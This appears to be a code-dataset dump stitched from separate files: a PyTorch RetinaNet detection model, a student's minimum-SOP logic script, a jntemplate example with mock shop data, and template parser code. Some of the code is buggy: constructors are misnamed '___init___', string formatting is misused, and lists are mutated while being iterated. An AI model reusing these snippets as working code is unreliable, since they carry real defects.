self.classifier = Classifier(self.cf, conv).cuda()
self.bb_regressor = BBRegressor(self.cf, conv).cuda()
if 'regression' in self.cf.prediction_tasks:
self.roi_regressor = RoIRegressor(self.cf, conv, self.cf.regression_n_features).cuda()
elif 'regression_bin' in self.cf.prediction_tasks:
# classify into bins of regression values
self.roi_regressor = RoIRegressor(self.cf, conv, len(self.cf.bin_labels)).cuda()
else:
self.roi_regressor = lambda x: [torch.tensor([]).cuda()]
if self.cf.model == 'retina_unet':
self.final_conv = conv(self.cf.end_filts, self.cf.num_seg_classes, ks=1, pad=0, norm=None, relu=None)
def forward(self, img):
"""
:param img: input img (b, c, y, x, (z)).
"""
# Feature extraction
fpn_outs = self.fpn(img)
if self.cf.model == 'retina_unet':
seg_logits = self.final_conv(fpn_outs[0])
selected_fmaps = [fpn_outs[i + 1] for i in self.cf.pyramid_levels]
else:
seg_logits = None
selected_fmaps = [fpn_outs[i] for i in self.cf.pyramid_levels]
# Loop through pyramid layers
class_layer_outputs, bb_reg_layer_outputs, roi_reg_layer_outputs = [], [], [] # list of lists
for p in selected_fmaps:
class_layer_outputs.append(self.classifier(p))
bb_reg_layer_outputs.append(self.bb_regressor(p))
roi_reg_layer_outputs.append(self.roi_regressor(p))
# Concatenate layer outputs
# Convert from list of lists of level outputs to list of lists
# of outputs across levels.
# e.g. [[a1, b1, c1], [a2, b2, c2]] => [[a1, a2], [b1, b2], [c1, c2]]
class_logits = list(zip(*class_layer_outputs))
class_logits = [torch.cat(list(o), dim=1) for o in class_logits][0]
bb_outputs = list(zip(*bb_reg_layer_outputs))
bb_outputs = [torch.cat(list(o), dim=1) for o in bb_outputs][0]
if not 0 == roi_reg_layer_outputs[0][0].shape[0]:
rg_outputs = list(zip(*roi_reg_layer_outputs))
rg_outputs = [torch.cat(list(o), dim=1) for o in rg_outputs][0]
else:
if self.cf.dim == 2:
n_feats = np.array([p.shape[-2] * p.shape[-1] * self.cf.n_anchors_per_pos for p in selected_fmaps]).sum()
else:
n_feats = np.array([p.shape[-3]*p.shape[-2]*p.shape[-1]*self.cf.n_anchors_per_pos for p in selected_fmaps]).sum()
rg_outputs = torch.zeros((selected_fmaps[0].shape[0], n_feats, self.cf.regression_n_features),
dtype=torch.float32).fill_(float('NaN')).cuda()
# merge batch_dimension and store info in batch_ixs for re-allocation.
batch_ixs = torch.arange(class_logits.shape[0]).unsqueeze(1).repeat(1, class_logits.shape[1]).view(-1).cuda()
flat_class_softmax = F.softmax(class_logits.view(-1, class_logits.shape[-1]), 1)
flat_bb_outputs = bb_outputs.view(-1, bb_outputs.shape[-1])
flat_rg_outputs = rg_outputs.view(-1, rg_outputs.shape[-1])
detections = refine_detections(self.anchors, flat_class_softmax, flat_bb_outputs, flat_rg_outputs, batch_ixs,
self.cf)
return detections, class_logits, bb_outputs, rg_outputs, seg_logits
def get_results(self, img_shape, detections, seg_logits, box_results_list=None):
"""
Restores batch dimension of merged detections, unmolds detections, creates and fills results dict.
:param img_shape:
:param detections: (n_final_detections, (y1, x1, y2, x2, (z1), (z2), batch_ix, pred_class_id, pred_score,
pred_regression)
:param box_results_list: None or list of output boxes for monitoring/plotting.
each element is a list of boxes per batch element.
:return: results_dict: dictionary with keys:
'boxes': list over batch elements. each batch element is a list of boxes. each box is a dictionary:
[[{box_0}, ... {box_n}], [{box_0}, ... {box_n}], ...]
'seg_preds': pixel-wise class predictions (b, 1, y, x, (z)) with values [0, 1] only fg. vs. bg for now.
class-specific return of masks will come with implementation of instance segmentation evaluation.
"""
detections = detections.cpu().data.numpy()
batch_ixs = detections[:, self.cf.dim*2]
detections = [detections[batch_ixs == ix] for ix in range(img_shape[0])]
if box_results_list == None: # for test_forward, where no previous list exists.
box_results_list = [[] for _ in range(img_shape[0])]
for ix in range(img_shape[0]):
if not 0 in detections[ix].shape:
boxes = detections[ix][:, :2 * self.cf.dim].astype(np.int32)
class_ids = detections[ix][:, 2 * self.cf.dim + 1].astype(np.int32)
scores = detections[ix][:, 2 * self.cf.dim + 2]
regressions = detections[ix][:, 2 * self.cf.dim + 3:]
# Filter out detections with zero area. Often only happens in early
# stages of training when the network weights are still a bit random.
if self.cf.dim == 2:
exclude_ix = np.where((boxes[:, 2] - boxes[:, 0]) * (boxes[:, 3] - boxes[:, 1]) <= 0)[0]
else:
exclude_ix = np.where(
(boxes[:, 2] - boxes[:, 0]) * (boxes[:, 3] - boxes[:, 1]) * (boxes[:, 5] - boxes[:, 4]) <= 0)[0]
if exclude_ix.shape[0] > 0:
boxes = np.delete(boxes, exclude_ix, axis=0)
class_ids = np.delete(class_ids, exclude_ix, axis=0)
scores = np.delete(scores, exclude_ix, axis=0)
regressions = np.delete(regressions, exclude_ix, axis=0)
if not 0 in boxes.shape:
for ix2, score in enumerate(scores):
if score >= self.cf.model_min_confidence:
box = {'box_type': 'det', 'box_coords': boxes[ix2], 'box_score': score,
'box_pred_class_id': class_ids[ix2]}
if "regression_bin" in self.cf.prediction_tasks:
# in this case, regression preds are actually the rg_bin_ids --> map to rg value the bin stands for
box['rg_bin'] = regressions[ix2].argmax()
box['regression'] = self.cf.bin_id2rg_val[box['rg_bin']]
else:
box['regression'] = regressions[ix2]
if hasattr(self.cf, "rg_val_to_bin_id") and \
any(['regression' in task for task in self.cf.prediction_tasks]):
box['rg_bin'] = self.cf.rg_val_to_bin_id(regressions[ix2])
box_results_list[ix].append(box)
results_dict = {}
results_dict['boxes'] = box_results_list
if seg_logits is None:
# output dummy segmentation for retina_net.
out_logits_shape = list(img_shape)
out_logits_shape[1] = self.cf.num_seg_classes
results_dict['seg_preds'] = np.zeros(out_logits_shape, dtype=np.float16)
#todo: try with seg_preds=None? as to not carry heavy dummy preds.
else:
# output label maps for retina_unet.
results_dict['seg_preds'] = F.softmax(seg_logits, 1).cpu().data.numpy()
return results_dict
def train_forward(self, batch, is_validation=False):
"""
train method (also used for validation monitoring). wrapper around forward pass of network. prepares input data
for processing, computes losses, and stores outputs in a dictionary.
:param batch: dictionary containing 'data', 'seg', etc.
:return: results_dict: dictionary with keys:
'boxes': list over batch elements. each batch element is a list of boxes. each box is a dictionary:
[[{box_0}, ... {box_n}], [{box_0}, ... {box_n}], ...]
'seg_preds': pixelwise segmentation output (b, c, y, x, (z)) with values [0, .., n_classes].
'torch_loss': 1D torch tensor for backprop.
'class_loss': classification loss for monitoring.
"""
img = batch['data']
gt_class_ids = batch['class_targets']
gt_boxes = batch['bb_target']
if 'regression' in self.cf.prediction_tasks:
gt_regressions = batch["regression_targets"]
elif 'regression_bin' in self.cf.prediction_tasks:
gt_regressions = batch["rg_bin_targets"]
else:
gt_regressions = None
if self.cf.model == 'retina_unet':
var_seg_ohe = torch.FloatTensor(mutils.get_one_hot_encoding(batch['seg'], self.cf.num_seg_classes)).cuda()
var_seg = torch.LongTensor(batch['seg']).cuda()
img = torch.from_numpy(img).float().cuda()
torch_loss = torch.FloatTensor([0]).cuda()
# list of output boxes for monitoring/plotting. each element is a list of boxes per batch element.
box_results_list = [[] for _ in range(img.shape[0])]
detections, class_logits, pred_deltas, pred_rgs, seg_logits = self.forward(img)
# loop over batch
for b in range(img.shape[0]):
# add gt boxes to results dict for monitoring.
if len(gt_boxes[b]) > 0:
for tix in range(len(gt_boxes[b])):
gt_box = {'box_type': 'gt', 'box_coords': batch['bb_target'][b][tix]}
for name in self.cf.roi_items:
gt_box.update({name: batch[name][b][tix]})
box_results_list[b].append(gt_box)
# match gt boxes with anchors to generate targets.
anchor_class_match, anchor_target_deltas, anchor_target_rgs = gt_anchor_matching(
self.cf, self.np_anchors, gt_boxes[b], gt_class_ids[b], gt_regressions[b] if gt_regressions is not None else None)
# add positive anchors used for loss to results_dict for monitoring.
pos_anchors = mutils.clip_boxes_numpy(
self.np_anchors[np.argwhere(anchor_class_match > 0)][:, 0], img.shape[2:])
for p in pos_anchors:
box_results_list[b].append({'box_coords': p, 'box_type': 'pos_anchor'})
else:
anchor_class_match = np.array([-1]*self.np_anchors.shape[0])
anchor_target_deltas = np.array([])
anchor_target_rgs = np.array([])
anchor_class_match = torch.from_numpy(anchor_class_match).cuda()
anchor_target_deltas = torch.from_numpy(anchor_target_deltas).float().cuda()
anchor_target_rgs = torch.from_numpy(anchor_target_rgs).float().cuda()
if self.cf.focal_loss:
# compute class loss as focal loss as suggested in original publication, but multi-class.
class_loss = compute_focal_class_loss(anchor_class_match, class_logits[b], gamma=self.cf.focal_loss_gamma)
# sparing appendix of negative anchors for monitoring as not really relevant
else:
# compute class loss with SHEM.
class_loss, neg_anchor_ix = compute_class_loss(anchor_class_match, class_logits[b])
# add negative anchors used for loss to results_dict for monitoring.
neg_anchors = mutils.clip_boxes_numpy(
self.np_anchors[np.argwhere(anchor_class_match.cpu().numpy() == -1)][neg_anchor_ix, 0],
img.shape[2:])
for n in neg_anchors:
box_results_list[b].append({'box_coords': n, 'box_type': 'neg_anchor'})
rg_loss = compute_rg_loss(self.cf.prediction_tasks, anchor_target_rgs, pred_rgs[b], anchor_class_match)
bbox_loss = compute_bbox_loss(anchor_target_deltas, pred_deltas[b], anchor_class_match)
torch_loss += (class_loss + bbox_loss + rg_loss) / img.shape[0]
results_dict = self.get_results(img.shape, detections, seg_logits, box_results_list)
results_dict['seg_preds'] = results_dict['seg_preds'].argmax(axis=1).astype('uint8')[:, np.newaxis]
if self.cf.model == 'retina_unet':
seg_loss_dice = 1 - mutils.batch_dice(F.softmax(seg_logits, dim=1),var_seg_ohe)
seg_loss_ce = F.cross_entropy(seg_logits, var_seg[:, 0])
torch_loss += (seg_loss_dice + seg_loss_ce) / 2
#self.logger.info("loss: {0:.2f}, class: {1:.2f}, bbox: {2:.2f}, seg dice: {3:.3f}, seg ce: {4:.3f}, "
# "mean pixel preds: {5:.5f}".format(torch_loss.item(), batch_class_loss.item(), batch_bbox_loss.item(),
# seg_loss_dice.item(), seg_loss_ce.item(), np.mean(results_dict['seg_preds'])))
if 'dice' in self.cf.metrics:
results_dict['batch_dices'] = mutils.dice_per_batch_and_class(
results_dict['seg_preds'], batch["seg"], self.cf.num_seg_classes, convert_to_ohe=True)
#else:
#self.logger.info("loss: {0:.2f}, class: {1:.2f}, bbox: {2:.2f}".format(
# torch_loss.item(), class_loss.item(), bbox_loss.item()))
results_dict['torch_loss'] = torch_loss
results_dict['class_loss'] = class_loss.item()
return results_dict
def test_forward(self, batch, **kwargs):
"""
test method. wrapper around forward pass of network without usage of any ground truth information.
prepares input data for processing and stores outputs in a dictionary.
:param batch: dictionary containing 'data'
:return: results_dict: dictionary with keys:
'boxes': list over batch elements. each batch element is a list of boxes. each box is a dictionary:
[[{box_0}, ... {box_n}], [{box_0}, ... {box_n}], ...]
'seg_preds': actually contain seg probabilities since evaluated to seg_preds (via argmax) in predictor.
or dummy seg logits for real retina net (detection only)
"""
img = torch.from_numpy(batch['data']).float().cuda()
detections, _, _, _, seg_logits = self.forward(img)
results_dict = self.get_results(img.shape, detections, seg_logits)
return results_dict
``` |
{
"source": "JINI7001/APTP2022",
"score": 4
} |
#### File: JINI7001/APTP2022/APTP2022_daeun.py
```python
'''
bin_list = ["abc", "a'b"]
n = 2
def binary_to_num(n, binary):
i = 0
askii_num = 97
while (i < n):
chr(askii_num) = 2**(n-i-1)
askii_num += 1
i+= 1
for alphabet in bin_list:
a =
num =
for binary_alp in bin_list:
bin_list = binary_to_num(n, binary_alp)
'''
###################################bool_to_minterm##############################################
#######################################다은이#############################################
# 최종 목표 : minimum sop 만드는거~
# 계획 : essential찾고
inputlist = [[[1,5],"a'c'd"],[[5,7],"a'cd"],[[6,7],"a'bc"],[[0,1,8,9],"b'c'"],[[0,2,8,10],"b'd'"],[[2,6,10,14],"cd'"]]
def findminsop(list):
listt = list
lista = []
listb = []
cov = []
for i in listt:
temp = i[0]
lista.append(i[0])
listb.append(i[1])
for k in temp:
if k not in cov:
cov.append(k)
print(lista) #[[1, 5], [5, 7], [6, 7], [0, 1, 8, 9], [0, 2, 8, 10], [2, 6, 10, 14]]
print(listb) #["a'c'd", "a'c'd", "a'c'd", "b'c'", "b'd'", "cd'"]
print(cov) #[1, 5, 7, 6, 0, 8, 9, 2, 10, 14]
nu = 0
fies =[]
while nu<len(cov):
fies.append(0)
nu = nu+1
print(fies) #[0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
# essential 찾기
for i in lista:
for k in i:
a = 0
while a<len(cov):
if k == cov[a]:
fies[a] = fies[a] + 1
a = a+1
print(fies) #[2, 2, 2, 2, 2, 2, 1, 2, 2, 1]
a = 0
essu = []
noessu=[]
while a< len(fies):
if fies[a] == 1:
essu.append(cov[a])
else:
noessu.append(cov[a])
a = a+1
essentialimplicant = []
b = 0
while b<len(lista):
for i in lista[b]:
if i in essu:
essentialimplicant.append(listb[b])
b = b+1
for i in essentialimplicant:
listb.remove(i)
# 남은 implicant 항들 in literal
c = 0
already = []
for i in lista:
for k in i:
for j in essu:
if k == j:
already.append(i)
lista.remove(i)
print("essential implicant =", essentialimplicant)
print("essential implicant num =", already)
print(listb) # 남은 implicant in 문자
print(lista) # 남은 implicant in 숫자
print(noessu) # 남은 커버해야 하는 문자
print("==============")
al = []
for i in already:
for j in i:
al.append(j)
if j in noessu:
noessu.remove(j)
#####################essential로 cover되는 애들 제거##################
b = 0
while b< len(lista):
jud = 0
for m in lista[b]:
if m in al:
jud = jud+1
if jud == len(lista[b]):
lista.remove(lista[b])
listb.remove(listb[b])
b = b+1
print(noessu) # 이제 cover해야하는 숫자
print(listb) # essential로 커버되지 않은 implicant in 문자
print(lista) # essential로 커버되지 않은 implicant in 숫자
print("==============")
last = []
b = 0
### 야매 패트릭###
k = 0
while b<len(lista):
ovl = 0
for i in lista[b]:
if i in noessu:
ovl = ovl+1
if k<ovl:
k = ovl
box = lista[b]
boxx = listb[b]
lista.remove(box)
listb.remove(boxx)
lista.insert(0, box)
listb.insert(0, boxx)
b = b+1
boxx = noessu
b = 0
while len(boxx) != 0:
for i in lista[b]:
if i in boxx:
last.append(listb[b])
boxx.remove(i)
b = b+1
llast = []
for i in last:
if i not in llast:
llast.append(i)
print( "essential아닌 prime =", llast)
print( "mim sop = ", essentialimplicant+llast)
findminsop(inputlist)
#########################################################################################
###################################classification_group#########################################
'''
# f를 1의 개수에 따라 group 으로 나누기.
# f를 리스트의 형태로 제공받아서 각각 1의 개수를 구하고, 그 개수별로 그룹을 묶어서 그룹 안에 저장.
def numsort(n):
flag = 0
str_binary = bin(int(n))
i=0
for i in range (len(str_binary)):
if(str_binary[i] == '1'):
flag += 1
return flag
def function3 (a, lst) :
i=0
k=0
finallist = [ [] for k in range (int(a))]
for i in range (len(lst)):
finallist[numsort(lst[i])].append(lst[i])
return finallist
i=0
a=input("자리수를 입력하세요 : ")
n=int(input("자료의 개수를 입력하세요 : "))
list = [0]
for i in range (n):
list.append(input())
result=function3(a, list)
for i in result:
for j in i:
print(j, end = ' ')
print()
'''
###################################classification_group#########################################
``` |
{
"source": "jiniannet/jnt.py",
"score": 2
} |
#### File: jnt.py/examples/example.py
```python
import os
import time
import sys
sys.path.append('..')
from jntemplate import Template,engine,BaseLoader,FileLoader
class Article(object):
def ___init___(self):
self.basis_id = 0
self.category_id = 0
self.content = ""
self.create_date = time.localtime(time.time())
self.default_picture = ""
self.description = ""
self.edit_date = time.localtime(time.time())
self.english_name = ""
self.module_id = 0
self.title = ""
class Product(object):
def ___init___(self):
self.basis_id = 0
self.category_id = 0
self.content = ""
self.create_date = time.localtime(time.time())
self.date_price = 0
self.default_picture = ""
self.description = ""
self.download_url = ""
self.edit_date = time.localtime(time.time())
self.english_name = ""
self.exampleUrl = ""
self.file_size = ""
self.gateway = ""
self.module_id = 0
self.title = ""
class Category(object):
def ___init___(self):
self.category_id = 1
self.category_name = "栏目1"
self.create_date = time.localtime(time.time())
self.deph = 1
self.english_name = "001"
self.module_id = 1
class ProductModule(object):
def ___init___(self):
self.basis_id = 0
self.module_name = ""
self.product_module_id = 0
class Help(object):
def ___init___(self):
self.basis_id = 0
self.category_id = 0
self.content = ""
self.create_date = time.localtime(time.time())
self.default_picture = ""
self.description = ""
self.edit_date = time.localtime(time.time())
self.english_name = ""
self.module_id = 0
self.title = ""
class DbRead(object):
def test(self,message, id, result):
return "您输入的参数是有:%s %d %s" % message % id % str(result)
def get_help_list(self,category, product, module, type_id):
arr = []
arr.append(Help())
arr[-1].basis_id = 301
arr[-1].category_id = 1
arr[-1].content = ""
arr[-1].create_date = time.localtime(time.time())
arr[-1].default_picture = ""
arr[-1].description = ""
arr[-1].edit_date = time.localtime(time.time())
arr[-1].english_name = "art001"
arr[-1].module_id = 1
arr[-1].title = "下单后可以修改订单吗?"
arr.append(Help())
arr[-1].basis_id = 301
arr[-1].category_id = 1
arr[-1].content = ""
arr[-1].create_date = time.localtime(time.time())
arr[-1].default_picture = ""
arr[-1].description = ""
arr[-1].edit_date = time.localtime(time.time())
arr[-1].english_name = "art001"
arr[-1].module_id = 1
arr[-1].title = "无货商品几天可以到货?"
arr.append(Help())
arr[-1].basis_id = 301
arr[-1].category_id = 1
arr[-1].content = ""
arr[-1].create_date = time.localtime(time.time())
arr[-1].default_picture = ""
arr[-1].description = ""
arr[-1].edit_date = time.localtime(time.time())
arr[-1].english_name = "art001"
arr[-1].module_id = 1
arr[-1].title = "合约机资费如何计算?"
arr.append(Help())
arr[-1].basis_id = 301
arr[-1].category_id = 1
arr[-1].content = ""
arr[-1].create_date = time.localtime(time.time())
arr[-1].default_picture = ""
arr[-1].description = ""
arr[-1].edit_date = time.localtime(time.time())
arr[-1].english_name = "art001"
arr[-1].module_id = 1
arr[-1].title = "可以开发票吗?"
return arr
def get_article_list(self,id):
arr = []
arr.append(Article())
arr[-1].basis_id = 301
arr[-1].category_id = 1
arr[-1].content = ""
arr[-1].create_date = time.localtime(time.time())
arr[-1].default_picture = ""
arr[-1].description = ""
arr[-1].edit_date = time.localtime(time.time())
arr[-1].english_name = "art001"
arr[-1].module_id = 1
arr[-1].title = "购物流程"
arr.append(Article())
arr[-1].basis_id = 301
arr[-1].category_id = 1
arr[-1].content = ""
arr[-1].create_date = time.localtime(time.time())
arr[-1].default_picture = ""
arr[-1].description = ""
arr[-1].edit_date = time.localtime(time.time())
arr[-1].english_name = "art001"
arr[-1].module_id = 1
arr[-1].title = "会员介绍"
arr.append(Article())
arr[-1].basis_id = 301
arr[-1].category_id = 1
arr[-1].content = ""
arr[-1].create_date = time.localtime(time.time())
arr[-1].default_picture = ""
arr[-1].description = ""
arr[-1].edit_date = time.localtime(time.time())
arr[-1].english_name = "art001"
arr[-1].module_id = 1
arr[-1].title = "生活旅行/团购"
arr.append(Article())
arr[-1].basis_id = 301
arr[-1].category_id = 1
arr[-1].content = ""
arr[-1].create_date = time.localtime(time.time())
arr[-1].default_picture = ""
arr[-1].description = ""
arr[-1].edit_date = time.localtime(time.time())
arr[-1].english_name = "art001"
arr[-1].module_id = 1
arr[-1].title = "常见问题"
arr.append(Article())
arr[-1].basis_id = 301
arr[-1].category_id = 1
arr[-1].content = ""
arr[-1].create_date = time.localtime(time.time())
arr[-1].default_picture = ""
arr[-1].description = ""
arr[-1].edit_date = time.localtime(time.time())
arr[-1].english_name = "art001"
arr[-1].module_id = 1
arr[-1].title = "联系客服"
return arr
def get_product_list(self):
arr = []
arr.append(Product())
arr[-1].basis_id = 201
arr[-1].category_id = 1
arr[-1].content = ""
arr[-1].create_date = time.localtime(time.time())
arr[-1].date_price = 245
arr[-1].default_picture = ""
arr[-1].description = ""
arr[-1].download_url = ""
arr[-1].edit_date = time.localtime(time.time())
arr[-1].english_name = "pro001"
arr[-1].example_url = ""
arr[-1].file_size = "564kb"
arr[-1].gateway = ""
arr[-1].module_id = 2
arr[-1].title = "产品1"
arr.append(Product())
arr[-1].basis_id = 202
arr[-1].category_id = 1
arr[-1].content = ""
arr[-1].create_date = time.localtime(time.time())
arr[-1].date_price = 245
arr[-1].default_picture = ""
arr[-1].description = ""
arr[-1].download_url = ""
arr[-1].edit_date = time.localtime(time.time())
arr[-1].english_name = "pro001"
arr[-1].example_url = ""
arr[-1].file_size = "564kb"
arr[-1].gateway = ""
arr[-1].module_id = 2
arr[-1].title = "产品2"
arr.append(Product())
arr[-1].basis_id = 203
arr[-1].category_id = 1
arr[-1].content = ""
arr[-1].create_date = time.localtime(time.time())
arr[-1].date_price = 245
arr[-1].default_picture = ""
arr[-1].description = ""
arr[-1].download_url = ""
arr[-1].edit_date = time.localtime(time.time())
arr[-1].english_name = "pro001"
arr[-1].example_url = ""
arr[-1].file_size = "564kb"
arr[-1].gateway = ""
arr[-1].module_id = 2
arr[-1].title = "产品3"
arr.append(Product())
arr[-1].basis_id = 204
arr[-1].category_id = 1
arr[-1].content = ""
arr[-1].create_date = time.localtime(time.time())
arr[-1].date_price = 245
arr[-1].default_picture = ""
arr[-1].description = ""
arr[-1].download_url = ""
arr[-1].edit_date = time.localtime(time.time())
arr[-1].english_name = "pro001"
arr[-1].example_url = ""
arr[-1].file_size = "564kb"
arr[-1].gateway = ""
arr[-1].module_id = 2
arr[-1].title = "产品4"
return arr
def get_category_list(self,mode):
arr = []
arr.append(Category())
arr[-1].category_id = 1
arr[-1].category_name = "栏目1"
arr[-1].create_date = time.localtime(time.time())
arr[-1].deph = 1
arr[-1].english_name = "001"
arr[-1].module_id = 1
arr.append(Category())
arr[-1].category_id = 2
arr[-1].category_name = "栏目2"
arr[-1].create_date = time.localtime(time.time())
arr[-1].deph = 1
arr[-1].english_name = "002"
arr[-1].module_id = 1
arr.append(Category())
arr[-1].category_id = 3
arr[-1].category_name = "栏目3"
arr[-1].create_date = time.localtime(time.time())
arr[-1].deph = 1
arr[-1].english_name = "003"
arr[-1].module_id = 1
arr.append(Category())
arr[-1].category_id = 4
arr[-1].category_name = "栏目4"
arr[-1].create_date = time.localtime(time.time())
arr[-1].deph = 1
arr[-1].english_name = "004"
arr[-1].module_id = 1
arr.append(Category())
arr[-1].category_id = 5
arr[-1].category_name = "栏目5"
arr[-1].create_date = time.localtime(time.time())
arr[-1].deph = 1
arr[-1].english_name = "005"
arr[-1].module_id = 1
arr.append(Category())
arr[-1].category_id = 6
arr[-1].category_name = "栏目6"
arr[-1].create_date = time.localtime(time.time())
arr[-1].deph = 1
arr[-1].english_name = "006"
arr[-1].module_id = 1
return arr
def get_product_url(self,model):
if model.english_name != None and model.english_name != "":
return "/Product/%s" % model.english_name
else:
return "/Product?id=%s" % model.english_name
def get_article_url(self,model):
if model.english_name != None and model.english_name != "":
return "/Article/%s" % model.english_name
else:
return "/Article?id=%s" % model.english_name
def get_help_url(self,model):
if model.english_name != None and model.english_name != "":
return "/Help/%s" % model.english_name
else:
return "/Help?id=%s" % model.english_name
def get_product_item(self,key):
model = Product()
model.basis_id = 1
model.category_id = 1
model.content = """<p style="text-align: center text-indent: 0"><img src="http://upload.chinaz.com/2015/0624/1435111490722.jpg" border="0" alt="视频网站 付费会员"></p>
<p>6月24日报道 文/肖芳</p>
<p>近日,爱奇艺高调宣布其月度付费VIP会员数已达501.7万,并称视频付费业务台风已经到来。而阿里巴巴宣布进入视频付费市场,将推出付费视频服务TBO(Tmall Box Office),它的模式将更接近美国在线影片租赁提供商Netflix,其中90%的TBO内容都将采用付费观看模式。</p>
<p>这不是业界首次探讨视频网站收费的可能性了。早在2008年,激动网就正式推出了付费点播品牌“激动派”,虽然2011年激动网声称80%的收入来自付费用户,如今却已转型淡出视频行业。其他的也基本都是“雷声大,雨点小”,付费没有形成足够的阵势。当时有说法称“谁第一个收费谁就第一个倒下”。</p>
<p>时隔5年视频网站再次呼唤用户付费。业内人士透露,目前视频网站或片方都已经在酝酿网络付费看剧,试图在网络付费领域上分一杯羹,最快明年就会试水。这一次的底气在哪?谈论这个问题之前不妨先从5年前的收费为何没有成气候说起。</p>
<p><strong>早年内容不成熟 付费1~2元也无人问津</strong></p>
<p>2010年,迅雷看看推出向用户收费的“红宝石影院”业务,一期推广高清下载,二期将推广高清在线观看,一部电影收费大约1元-2元钱,高清在线观看的收费项目将成为现实。</p>
<p>由迅雷看看当时的宣传页面可以窥见“红宝石影院”的初衷:“买一张盗版碟至少要花5元钱,而在红宝石上下载一部正版高清电影最低只花2元钱。正版比盗版还便宜。”虽然在业务推出前期,迅雷看看展开声势浩大的宣传,但“红宝石影院”后来也销声匿迹,迅雷看看的营收依然是以传统的广告为主。今年年初,迅雷把一直处于亏损状态下的看看出售,免于拖累上市公司。</p>
<p>花2元看正版,比5元买盗版碟还便宜,这个初衷是好的,但也要考虑收费实施的基础。一方面是用户付费意愿,另一方面是视频网站的服务能否达到收费的水平。</p>
<p>在用户付费意愿上,2010年某门户网站曾经做过一项调查。结果显示,愿意为视频点播付费的网友只有383名,而不愿意的则达到6095名,后者是前者的15倍。由此可见,只有6%的网友愿意付费,没有用户的支持视频网站畅想的再美好都无济于事。</p>
<p>另一方面,2010年前后,在线视频的品质还不够好。由于带宽等因素的限制,视频很难达到高清的效果。同时,视频网站购买版权的意识也不如现在强,很多内容都来自网友上传,体验很差。</p>
<p>当时,另一家坚持免费观看的视频网站负责人道出了视频收费不宜大规模推广的原委。她指出,要想让用户掏钱看视频,首先要满足两个条件:一是网站要有独家的、不可替代的内容,否则网友不会“买账”;二是用户的使用习惯。对于前者,可以靠投入重金买版权来实现;但对于后者,她并不乐观地表示,让习惯了免费看视频的用户掏钱买收视权,短期内是不太现实的。</p>
<p><strong>服务升级后 视频网站亟需付费扭转巨亏</strong></p>
<p>可以看到,2010年之后视频网站在朝着正版化、高清化发展。视频网站在不断砸钱购买内容,同时也在改善视频播放技术,让网友获得更好的观看体验。</p>
<p>对比2010年优酷网和如今优酷土豆的财报便可以发现端倪。2010年第四季度,优酷的内容成本为1250万美元,比2009年增长11%,净亏损为570万美元。2014年第四季度,优酷土豆的内容成本为9,720万美元,是2010年同期的8倍,净亏损为5130万美元,接近2010年同期的10倍。</p>
<p>越是投入越是亏得厉害,不只是优酷,这是近5年来视频行业发展的缩影。可以看到多家视频网站因资金问题“卖身”,而现在留下的视频网站背后都背靠大树。没有巨头的支持,视频“烧钱”的游戏很难再持续下去。</p>
<p style="text-align: center text-indent: 0"><img src="http://upload.chinaz.com/2015/0624/1435111500344.jpg" border="0" alt="视频网站 付费会员"></p>
<p>视频网站付费会员增长超700% 苦熬7年再度掀付费潮</p>
<p>归根到底,这是由于广告收入的增速远远不及内容成本的增速(图为2014年优酷土豆内容成本和广告收入成本的同比增长),依靠内容投入拉动营收就如同一个无底洞,只会将自己陷得越来越深。</p>
"""
model.create_date = time.localtime(time.time())
model.date_price = 940
model.default_picture = "http://upload.chinaz.com/2015/0624/1435111500344.jpg"
model.description = "近日,爱奇艺高调宣布其月度付费VIP会员数已达501.7万,并称视频付费业务台风已经到来。而阿里巴巴宣布进入视频付费市场,将推出付费视频服务TBO(Tmall Box Office),它的模式将更接近美国在线影片租赁提供商Netflix,其中90%的TBO内容都将采用付费观看模式。"
model.edit_date = time.localtime(time.time())
model.english_name = "001"
model.example_url = "http://www.baidu.com"
model.file_size = "54KB"
model.title = "视频网站付费会员增长超700% 苦熬7年再度掀付费潮"
return model
def get_default_int(self,key, defaultValue):
return defaultValue
def get_product_module(self,product):
arr = []
arr.append(ProductModule())
arr[-1].basis_id = 101
arr[-1].module_name = "测试模块"
arr[-1].product_module_id = product
arr.append(ProductModule())
arr[-1].basis_id = 102
arr[-1].module_name = "订单模块"
arr[-1].product_module_id = product
arr.append(ProductModule())
arr[-1].basis_id = 103
arr[-1].module_name = "产品模块"
arr[-1].product_module_id = product
arr.append(ProductModule())
arr[-1].basis_id = 104
arr[-1].module_name = "新闻模块"
arr[-1].product_module_id = product
return arr
def get_page_index(self):
return 1
def get_pager(self):
return '<span>首页</span> <span>上一页</span> <a href=\"?page=1\">1/a> <span>下上一页</span> <span>末页</span>'
if __name__ == '__main__':
loader = FileLoader()
db = DbRead()
loader.directories.append(os.getcwd()+'\\templets\\')
loader.directories.append(os.getcwd()+'\\templets\\public\\')
print(os.getcwd()+'\\templets\\')
engine.configure(loader=loader)
template = engine.load("questionlist.html")
template.set("func", db)
html = template.render()
print(html)
```
#### File: jnt.py/jntemplate/parsers.py
```python
from abc import abstractclassmethod, ABCMeta
from jntemplate.core import VariableTag, ValueTag, IfTag, ElseifTag, ElseTag, \
ForeachTag, FunctionTag, ExpressionTag, SetTag, EndTag, TextTag, ReferenceTag,\
IncludeTag, IndexTag, LoadTag
import jntemplate.utils
from jntemplate.nodes import TokenKind
__all__ = ["VariableParser", "StringParser", "SetParser", "NumberParser",
"LoadParser", "IncludeParser", "IfParser", "FunctionParser",
"ForeachParser", "EndParser", "ElseifParser", "EleseParser",
"BooleanParser", "IndexParser", "ComplexParser"]
class TagParser(object):
@abstractclassmethod
def parse(self, template_parser, tc):
pass
class VariableParser(TagParser):
def parse(self, template_parser, tc):
if tc != None \
and len(tc) == 1 \
and tc[0].kind == TokenKind.text_data:
tag = VariableTag()
tag.name = tc[0].string()
return tag
return None
class IndexParser(TagParser):
def parse(self, template_parser, tc):
if tc != None \
and len(tc) > 3 \
and tc[-1].kind == TokenKind.right_bracket:
y = len(tc) - 1
x = -1
pos = 0
i = y
while i >= 0:
if tc[i].kind == TokenKind.dot and pos == 0:
return None
if tc[i].kind == TokenKind.right_bracket:
pos += 1
i -= 1
continue
if tc[i].kind == TokenKind.left_bracket:
pos -= 1
if pos == 0 and x == -1:
x = i
i -= 1
if x == -1:
return None
tag = IndexTag()
tag.container = template_parser.read(tc[0: x])
tag.index = template_parser.read(tc[x + 1: y])
return tag
return None
class StringParser(TagParser):
def parse(self, template_parser, tc):
if tc != None \
and len(tc) == 3 \
and tc[0].kind == TokenKind.string_start \
and tc[1].kind == TokenKind.string \
